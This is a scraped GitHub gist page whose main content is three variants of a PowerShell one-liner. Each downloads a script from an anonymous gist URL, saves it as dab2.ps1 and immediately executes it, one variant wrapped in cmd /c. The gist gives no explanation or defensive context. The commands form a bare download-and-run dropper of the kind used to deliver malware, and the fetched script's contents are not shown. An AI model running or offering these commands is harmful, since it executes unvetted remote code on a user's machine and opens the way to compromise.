Skip to content

Instantly share code, notes, and snippets.

@elagrija
Created January 22, 2018 04:12
Show Gist options
  • Save elagrija/d028ca8bb7225989a04dbcf68e052003 to your computer and use it in GitHub Desktop.
Save elagrija/d028ca8bb7225989a04dbcf68e052003 to your computer and use it in GitHub Desktop.
Untitled
PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');(New-Object -com Shell.Application).ShellExecute('dab2.ps1');
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');(New-Object -com Shell.Application).ShellExecute('dab2.ps1'); "
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');Start-Process 'dab2.ps1';"
<!-- content to be placed inside <body>…</body> -->
// alert('Hello world!');
{"view":"split","fontsize":"100","seethrough":"","prefixfree":"1","page":"all"}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment